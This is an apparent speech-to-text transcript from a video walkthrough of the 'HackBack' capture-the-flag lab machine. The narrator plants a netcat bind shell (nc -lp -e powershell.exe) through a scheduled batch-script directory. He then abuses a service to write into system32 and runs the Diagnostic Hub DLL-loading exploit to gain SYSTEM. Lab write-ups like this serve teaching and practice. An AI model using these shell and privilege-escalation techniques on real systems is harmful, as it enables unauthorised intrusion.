sure if there's a self-revert. There probably is. So we can do C:, Windows NC64.exe -L, is it 9002-C cmd.exe? Is that how you do it? Let's see. CP NC64.exe to named pipe. Go here. We can close out of these windows. Clean up, clean up. I'm in users IPsec. Delete that. NC64. Where is IPsec? Users, IPsec, paste. So NC64.exe, we thought -L. We'll probably need P. LP 9002-C cmd.exe. And then, I wonder if we have netcat here. I just remember the reason we didn't do something before was we didn't have bridge mode enabled. NC, sweet, we do have NC. So NC localhost -P 8002. What? Localhost space 8002. And did it error? Nope, it looks like we connected. So if I exit here, we maybe did. We'll do -C PowerShell. Is PowerShell.exe a thing? It is. So this is how we'll know. NC localhost 9002. And invalid connection. cmd.exe. Maybe nc64.exe-h. Detach. -C is send CRLF, so that's not it. What is execute program? -E. So -E PowerShell. And there we go. So we need -E. So we can do -E PowerShell.exe. Okay. Now we can upload dellog.bat. And we have uploaded it. So if we go back to, we probably uploaded it to the wrong directory. cd /util scripts // upload dellog. Access is denied. That's bizarre. Get UID. Thought we could do this. Maybe it's a spool directory you write into. dir cd spool. Let's see what dellog.bat actually does. So right here we have for f in something, C:/util script spool star.bat, do, start, and execute it. So we just want to take this line and upload it to the spool. So let's delete everything, and then write ipsec.bat, and then we will upload this one. So we're in spool. So upload ipsec.bat. dir. Okay. And if we look at del log again, after it executes, it deletes it. So when ipsec.bat gets deleted, we know it executed it, and we can try connecting back on port 9002. So if you want to do something extra, you can try getting this bat file to execute Meterpreter and use kind of the same method we did before we did all that SMB pipe impersonation just to get a Meterpreter executable. So you do the same thing, except instead of netcat, use Meterpreter. So I'm going to give this like 5 or 10 minutes, and then we'll come back and see if it executed. So it's been quite a bit of time. If we do dir, we see no scripts in spool. So let's do proxy chains nc 127.0.0.1 9002. I think we'd specify -p on Linux. So we're connecting and connection refused. Uh-oh. That's not good. Let's see. Let's go back to our shell and find string 9002. Are we listening? We are not. So let's see. Let's clean this up. Clean all my panes up. Exit that. 7 is MSF. So let's see. Let's pwd here, and let's go somewhere that everyone can write. Probably public documents. // always throws me off. cd users public documents. Put ipsec.bat. Upload ipsec.bat. We can go here, cd users public documents, and we'll try executing ipsec.bat and see what happens. Maybe it's just like PowerShell it doesn't like. /ipsec.bat. Do we get any error messages? Let's see. Local listen something. That's never good. That's a weird error message. ipsec.bat. Let's see what it is. How did it copy? So it copied this. If we paste this, -L-P. It probably needs the -P. So let's go back to Metasploit. 9002. Connection refused. Let's see. Connect back. Hopefully killing my NamedPipe didn't just kill my Metasploit shell. pwd. Did not. So let's do NetStat. an find string 9002. We are listening on all ports. Proxy chains. Let's try 10.10, 10.128. Connection refused. Oh, we don't use -P. Okay. So there we go. So we know what to change ipsec.bat to. We need -L, -P, and that's it. So we can go cd util scripts spool, upload ipsec.bat, and then wait for the shell to get executed. So I guess while we wait, we're going to skip ahead a little bit and cheat and do the next part. So if we look at services, let's grab this again from the very beginning of the box and see if we find any non-standard services. Oh, it's so painful to read. Let's just awk for the very first one and go through this. So AJ route is interesting. So we'll do unique services. We want to look into that. I don't know what ALG is. Bits, crypto. We got the Diagnostic Hub service. GoPhish, we already know. I don't know what NSI is. P. Don't know what UserLogger is. And that's it for that. So let's get rid of that awk. UserLogger and user manager. I don't understand what either of those are. So things we want to look in when we get a shell in the box, because these are unique. NSI. I thought NSI was there. Maybe it was NSL. Let's see. Lowercase. No XOR interface service. So that's probably not too interesting. ALG and router. So at the very top. Application layer gateway service, so that's fine. And all joy router service. So what was it? Logger. So these two are interesting. Let's go back to Metasploit. Did we kill enough time where it executed a script? It looks like we did. So let's do proxy chains, netcat. We can try 127.0.0.1, port 9002. And finally, we are the hacker user as PowerShell. So we can do get service, UserLogger. Let's see if I could type. Oh, I should have done RL wrap. Get service UserLogger. So we can see it stopped. If we do SC query UserLogger. Let's see. CMD/C SC query UserLogger. Or SC, maybe it's SCQC UserLogger. SCQC UserLogger. CMD/C. Crap. Uh-oh. Uh-oh. we'll just Control C and do URL wrap. Do it how we wanted. Re-upload this and wait. So I'll pause the video and then resume in like 5 or 10 minutes when it executes. So I think enough time has passed. We do ls, nothing exists. Go back over here, URL wrap, and this time we can do we'll do cmd/c sc query UserLogger, and we can see information about it. I think if we do maybe QC, we get more information, and we can see the binary path for the service is c:\Windows system32 userlogger.exe. If we did sc sd show UserLogger, we can get information about who can start and stop this. This is local system. If we look at this SID and do wmic user account get SID, see, user account where name is equal to, I think we'll HackBack, get SID, who am I? We're hacker. So we see URSID ends in 1003. This is the boxes SID or domain SID, but this isn't part of a domain, so probably a box SID. So 1003, we see A, which means we have access to probably start and stop this service. So let us go and analyze this binary. Crap. Let's go back to Meterpreter, cd, Windows, system32, download userlogger.exe. Having Meterpreter on the box makes it nice for that reason. And we can strings, userlogger.exe, and let's see. There's a lot of strings here. Program in DOS mode. And right at the top, we see UPX0 and UPX1, which is UPX packing. I think I have UPX installed on Kali. I do. So if we do UPX, is it -- help? So -D is decompress. And if we decompress, we specify -O next for out file. So we should be able to do UPX-D userlogger-O userlogger.unpacked.exe. We unpacked one file. Now when we run this, we have a lot more information or calls or functions. So if we do the unpacked one again, you can see we only really have a handful of things. And that's because it kind of did what our XOR did and just packed it all up. So let's see. If we go down, can we do really anything? Let's just execute this. So cp userlogger unpack.exe to NamedPipe, because that's where our SMB stuff is. We can go here and let's copy. Let's see, do we have it open? Here it is. Userlogger.unpacked. Paste it. And if we just execute it, doesn't look like anything really happens. Test. So let's create a service with this. So sc create UserLogger bin path is equal to c:\users ipsec userlogger.unpacked.exe. Access denied. We need to be system or UAC. Sc create UserLogger bin path is equal to users ipsec userlogger.unpacked.exe. Let's see. There we go. Sc start UserLogger, and it failed. Do we have process? We have hacker. Do we have process monitor? It's got to be somewhere. Let's see. Tools. Utilities. We'll just download it. Search for a process monitor, sysinternals, download. I wonder if it's unpacking it that screwed it. I guess we can try the other version. I didn't copy it yet. Probably should run as administrator. Let's see. Filter for, where's process name? Process name is userlogger.exe. Add the item. Apply. Okay. Oh, it's unpack.exe. UserLogger unpack.exe. So we can see everything that happened. Let's see. There's it crashing. Let's just copy the other one, not the UPX. So copy cp user logger.exe to NamedPipe. And then I guess we got rid of it. \\. We execute this, it still doesn't show us anything. Let's see. Where do we clear? Let's try this again. So we can do sc delete and sc create. Don't do the unpacked version. Just do this. Sc start UserLogger. And this time it looks better. So if we scroll here, let's see, we tried to create a file in temp, read file, created another file. This is really small. Options, font. There we go. Wonder if I reopen this, if it'll be bigger font. There we go. Okay. So let's stop, start. So let's say we can also do a filter for the operation. So let's do, where is operation? There it is. Just give it a drop down. There we go. Create file. Yep. So we can see all the files this created. And we can see c:\windows temp userlogger service.log. So let's see what that file is. c:\windows temp. Yes, I want permission to this. UserLogger Service.log. And we can see no log file specified using the default. And then the same thing. So services, if we do services here, come on, load. Services.msc. There we go. UserLogger. Path. Start parameters, I think, or maybe it would just be here, but you can say give programs arguments to run. So if we just stop this, we do sc start userlogger. We'll do c:\test.log. Let's see, did it create test.log? There we go. c:\windows test.log.log. So we just guessed at a argument that we could give it, since it said no arguments, and saw it wrote to that. So if we write to c:\windows system32/pwned, we need start. And we go into that directory. So c:\windows system32. pwn.log does exist. And if we look at the ACLs, everyone can write to it. So it's creating a file with really weak permissions. And when you can write into the system32 directory, you can use the diag hub to privesc. So if we do diag hub Google project 0, let's see, maybe it's Diagnostic Hub. This one's probably it. So this is a good article to read about it, but essentially you can execute any DLL that's inside of system32, and it doesn't need the extension of .dll. It just has to be a file. So if you do like real original, this is Mumbai's GitHub with his ALPC diag hub. This, I believe, is one of Sandbox Escaper's things, and he's using diag hub for it instead of the printers. So you can take a look at this, but I'm going to be really lazy since I think I've been recording for a very long time today. So we're just going to go to Decoder IT or Decoder's GitHub, diag hub. One of the creators of the box has a project on GitHub to exploit this. The reason why I'm not using the one on real originals that we just looked at is because it's using an exploit to create a file. We don't have to create a file. We already have a file. So yeah. So I'm going to copy this here. And we can close all this. Open this. And we'll have to make probably very few changes to get this working. But the very first thing I do once I open this project is attempt to compile it and make sure it compiles. So once it loads, let's try building this one, the Diagnostic Hub Exploit. We may want to change it to release, not debug. SDK is not found, retarget. So let's, should be able to retarget it. My machine's going slow. Right click here, properties, Windows SDK. Let's do it to this one. And because the box is Windows 2019, chances are that it will be compatible. Build. Turned on storage sense. Okay. And we can build this one next. So that succeeded, and we'll see if this succeeds. And we can look at fake DLL to see what this is. Process module attach, G module. Let's see. What is this? And this looks like what is going to be executing code. And we see very similar things to what we did earlier. And we have it looking like it's executing c:temp r.bat. So let's do hacker root.bat. And we'll save that. And recompile this one. So build, rebuild, fake DLL. Let's look at Diag Hub and see if there's anything here. Let's see. Extern. Session configuration. Load DLL. And it needs a valid directory, c:\temp. Probably doesn't exist. So let's do c:users hacker etw. So let's see if that creates c:\temp didn't exist at all. So if it tried to do that create directory, it would fail because temp wasn't there to begin with. And we probably don't have permission to write at the root of C. So let's compile this as well, again, with those changes. And then we'll copy them to a Linux box and hope for the best. So let's go to fake DLL, x64, debug. Let's do, where is it? Where's the .dll? Let's see. Here it is probably, x64 debug. Yep. So we need these two, the DLL and exe. Let's go to // test. We're not listening anymore. Let's see. Where is our SMB server? ps-ef grep SMB-s. It is listening. Okay, it just took a while to open. This isn't it. / that. Oh, why is that not opening? Something weird is happening. 8 Python authentication, connection timed out. bkill -9 SMB server. NetStat ALNP grep 445. It's not listening. Launch it. Test. Authenticate successfully. CMD net use z : 172.1610.138 /test user please cd z. Something weird is going on. Let's see. Can I just put these in my clipboard and copy them this way? Nautilus period. Paste. Nope. So I'm going to pause the video and just have these copy through my host machine since these two VMs can't talk directly. So be right back. So I got them copied. Diagnostic Hub Exploit and fake DLL. So let's go to Metasploit. And let's see, where are we? We're in system 32. So we want to go back into the spooling directory. Not spool, color. There we go. So pwd, we are there. We can move the NamedPipe stuff. This is fake DLL here, and move NamedPipe Diagnostic Hub Exploit here. Upload Diagnostic Hub Exploit.exe. And as soon as that's done uploading, we can upload the next one. While that goes, we can do sc start UserLogger C:\Windows pwned. See, cmd/c, and it was actually system32 \pwned. So we have to stop that. Start cd. We can do dir find string pwned. cmd/c type pwned.log. Did not find it. Let's see. UserLogger. Well, while we do that, let's upload fake DLL.dll. So now we have everything there. We just have to figure this piece out again. C:\Windows system32 pwned. So already running. cmd/c dir find string pwn. Why is it not there? Type pwn.log. Let's try this. Already running. Stop it. Start it. dir slash pwn.log does exist. Stop it. C: Windows system32 pwned. dir cmd/c dir find string pwn. If we do dir C: \\, oh wait, Windows system32. No. Let's try stop. And we'll do start. /pwned. Let's see. Let's see. Stop service, UserLogger. We'll do get service, UserLogger, stopped. So maybe we can do start dash arguments C: /Windows system32 pwn. Argument. Let's see. PowerShell start service argument. Let's see, get service, invoke expression sc start my service exe1. We can try it this way. UserLogger C: Windows system32 pwn. Search for pwn, and we got it. Let's do this find string thing again. Okay, so we got it working. I guess it just didn't like me invoking this with cmd/c. I bet if I had my original netcat shell as a command prompt, that wouldn't have happened. So now let's copy fake DLL over top of it. So we can go copy spool drivers color fake DLL.dll to pwn.log. We can see the file size is much larger. And let's see, we have to create ipsec.bat. We'll change this to 9003. And we have to upload this into users hacker. And we upload ipsec as root.bat, because that's what we called it. So upload root.bat. And we can do cd drivers color Where was it? Spool driver's color. Okay. And we run diaghub exploit.exe with pwned.log. Did that work? That was too quick. AN find string 9003. Did not find it. Let's see. Pwn.log. Run that. Does not look like it's working. So if we do ls here, we should see the etw directory get created. And I don't see any etw directory. So maybe the exploit failed to create that. So what I'm going to do, I'm going to go back here, and we're going to change that to program data. So c:\users hacker, we don't need that. We can do program data, because maybe this doesn't have the correct permission to overwrite or create a directory and hackers directory. Program data. There we go. So let's copy this again. Copy. Going to paste it on my host. Go over here. Copy, and we will paste it here. Drag, drop. File modifications different, so replace. And now let's pwd. We're in c:\users hacker, so we have to go back into this, and we can upload diaghub exploit.exe. I guess while that uploads, if we go here, let's see, decoder. Where do we download that? Repositories. Diaghub, does he have instructions? Does not look like he does. So no readme. Does not look like that worked. If we do netstat-an find string on 445, we do get stuff back, so we know that's not working. Less root.bat. That all should work. So let's see. What could be going wrong? If we go into program data, dir, can we make dir etw? Dir, etw does exist here now. Run this again. Does this want the full path of pwn.log, c:\Windows system 32? netstat-an find string 9003. Nope, that's not it. Let's try executing it outside of PowerShell. So cmd/c, c:\Windows system32 spool drivers color diag hub exploit.exe pwn.log. I forgot the end quote. Can I control C it? No, I can't. And now we have to wait for a stupid connection. So copy root.bat to ipsec.bat. Let's edit this to be 9002. cd users HackBack users. Oh no, this is scripts. So util scripts spool upload ipsec.bat. So right about now, I wish I had used Meterpreter in the very beginning, because if I did, when I made mistakes like this that killed my session, then I wouldn't have to redo everything. So sometimes using Meterpreter is definitely nice. So let's copy this. Copy this. And then we'll just wait for us to be able to connect. So it's probably been about 10 or 15 minutes. So let's connect back to this box and then paste what we had, which is this. And nothing happens. So let's do environment is 64-bit process. We are. So let's see. NetStat -an find string pwn, or not that, 900. We should have a 9003. So let's see. I'm going to change this from PowerShell to be cmd.exe, and maybe this will help it. 9004 upload ipsec.bat. But if we look at this code, it should be doing some type of prints. So let's see. Diag hub exploit 64-bit, that is correct. Print. So after everything, it should be printing. So maybe it's how we're copying it over to a box that doesn't work. Or maybe it's the Windows kit that it doesn't have. Can't imagine that's the case though. Desktop, diag hub exploit, x64, debug, /diag hub exploit. Still compiling, I think. Nope, it's done. Diag hub exploit.exe. exe. It is not here. Let's just cd into this directory. Copy, cd, diag hub exploit.exe. So it definitely should give some type of standard out. So let's see, do we have invoke expression back here? We can try it this way. See if this gives us anything. Because it looks like it's how we're executing this now. pwn.log. If we do dir find string pwn, does exist. netstat-an find string 900. Don't have the 9004 yet. Let's see. I guess we'll just wait for 9004 to open up, and then we'll try it again on 9004. Because I'm guessing if we do rl wrap back here, it's going to give a very similar response. cd Windows system32 spool drivers color, I think. Is that going to work? There we go. Diaghub exploit.exe. See if we get any output back. We do not. So we should get the error message. Oh, we have 9004 listening. So let's go to 8 proxy chains and see localhost 9004. Drivers spool drivers color dir diaghub exploit.exe diaghub exploit.exe. Not getting anything. exploit.exe pwn.log cmd/c diaghub exploit.exe pwn.log. I'm guessing it's the actual targeting now, because I definitely should be getting standard out. dir c : Windows system32. Oh no. NetStat an find string 900. Yeah. So I'm going to try downloading a different targeting pack, because maybe that's it. Actually, I just noticed I'm on debug mode still. It probably didn't put a lot of the packages in. So let's change over to release and hate our lives if this is it. So c : program data etw is a writable directory. Let's go to fake DLL, and I noticed an issue here. So let's do users hackback root.bat, and this will be release as well. Build solution. So everything as release. So let's go back into this directory, and let's copy the exe and the DLL. And I'm copying it to my host right now, so I can copy it over to my Linux machine. And then let's go over here, drag and drop, retry, replace, replace. And let's upload them. So let's go over to Meterpreter and pwd. Let's go into the directory with driver's color. And now let's upload. Let's actually rename these. Rename please work.exe, and where's the DLL? It's fake DLL. There we go. Please work.dll. Okay, so now we got both of those. We can upload please work.exe, and then next we can upload the DLL. And as this goes, we can go into Windows System 32, spool, drivers, color, operation timed out. That's not good. Go over here and upload this way. So pls-work.exe, name it pls-work.exe. This is the WinRM shell, so we're trying it this way. Maybe this will work, unless the box is just unresponsive. Okay. I was used to seeing like copying size and space. DLL. So let's see. Let's go back here. Please work.exe. And we have specify a fake DLL name. Finally, we got this working, and it's copying over the DLL now. And once that copies, we can do copy please work.dll to c:\windows system32 pwn.log. Okay, it's copied. Pwn.log. Copied over. So please work.exe, pwn.log. All DLL should have been loaded. That's what we wanted to see. So find string 900 and did not execute. So that is odd. cmd/c c:\windows system32 spool drivers color please work.exe pwn.log. We should have 9003. So let's see. dir run dll 32. Please work.dll dll main. I wonder if something's wrong with the DLL, because that should have worked. Let's see, what did we copy? C:, root HTTP boxes HackBack please work.dll. If we go here, C:\users /HackBack. Nope. This is hacker root.htb. Build solution. And let's see. Copy fake DLL. Go over to my box. Paste. Now we can upload this one. So let's just call this. We'll just upload it straight to pwn.log. Pwn.log. And we'll call this was fake DLL.dll. Okay, everything is copied. Let's go back here. And let's run this. NetStat. We got 9003 listening. Holy crap. I think we finally just did that. So let's look at 9003. Who am I? And we're NT-authority/system. Thank God. So let's go to CD users, administrator, CD desktop. Documents, is it? Oh, it's going to be a hidden file. GCI dash hidden desktop. Yes, it is. So if we go into desktop, we can do get content root.text, and we'll notice that's not the flag. But thankfully, it's not too hard from here. If we do get child items dash streams dot maybe, or let's just do cmd/c dir/a/ r, I think, for streams. And we can see there is a flag.text. So if we do get content root.txt flag.txt, that's not it. Get content, or maybe we can just type it. cmd/c type root.txt flag.txt. Nope, we need the get content. So let's see. PowerShell view stream. Let's see. Stream as byte. So dash stream. Get content root.text dash stream. Root.text dash stream flag.text. And there we go. That is the box. There is one alternative path that would have saved probably an hour of this video. If we just go all the way back, let's look at cd util scripts. The clean.ini actually had a command injection vulnerability. I'm not going to show it, but whoops. Well, that stream's dead. CD, I don't want to do that because then I have to do more editing to hide that flag. We'll do it from here. We'll do cmd/c type c:\util scripts clean.ini. In this script, if you put a and signed and then something after, I think, log file, it was either log file or directory, probably log file. So if you did log file equals some directory space and then a path of a .bat file, you had a command injection vulnerability there as an alternative path. But that is the video. Take care, and I will see you all next week.